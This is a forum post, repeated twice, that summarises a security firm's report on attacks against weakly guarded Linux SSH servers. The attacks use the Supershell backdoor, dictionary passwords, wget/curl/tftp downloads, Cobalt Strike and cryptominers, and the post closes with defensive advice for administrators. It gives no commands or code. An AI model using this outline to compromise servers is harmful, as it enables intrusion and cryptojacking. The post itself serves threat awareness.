Friend
Professional
- Messages
- 2,653
- Reaction score
- 852
- Points
- 113
SSH connection is a checkpoint for the entry of uninvited guests.
Researchers from ASEC have identified new attacks targeting poorly protected Linux SSH servers. In them, the hackers used the Supershell malware, written in the Go language. This backdoor provides attackers with remote control over compromised systems.
After the initial infection, hackers run scanners to look for other vulnerable targets. It is assumed that these attacks are carried out using password dictionaries obtained from already infected servers.
Attackers use the wget, curl, tftp, and ftpget commands to download and execute malicious scripts. These scripts allow you to gain full access to the system and install additional malware, and then hide the traces of the attack by deleting the downloaded files.
As a result of installing a backdoor, hackers can set up hidden cryptocurrency miners such as XMRig on infected hosts, which is a typical attack scheme for vulnerable Linux servers. In the campaign under review, the hackers also used Cobalt Strike to set up remote access and ElfMiner to install cryptominers.
Experts recommend that administrators strengthen the protection of their systems, regularly update software, use complex passwords and enable firewalls to minimize the risk of infection.
Source
Researchers from ASEC have identified new attacks targeting poorly protected Linux SSH servers. In them, the hackers used the Supershell malware, written in the Go language. This backdoor provides attackers with remote control over compromised systems.
After the initial infection, hackers run scanners to look for other vulnerable targets. It is assumed that these attacks are carried out using password dictionaries obtained from already infected servers.
Attackers use the wget, curl, tftp, and ftpget commands to download and execute malicious scripts. These scripts allow you to gain full access to the system and install additional malware, and then hide the traces of the attack by deleting the downloaded files.
As a result of installing a backdoor, hackers can set up hidden cryptocurrency miners such as XMRig on infected hosts, which is a typical attack scheme for vulnerable Linux servers. In the campaign under review, the hackers also used Cobalt Strike to set up remote access and ElfMiner to install cryptominers.
Experts recommend that administrators strengthen the protection of their systems, regularly update software, use complex passwords and enable firewalls to minimize the risk of infection.
Source
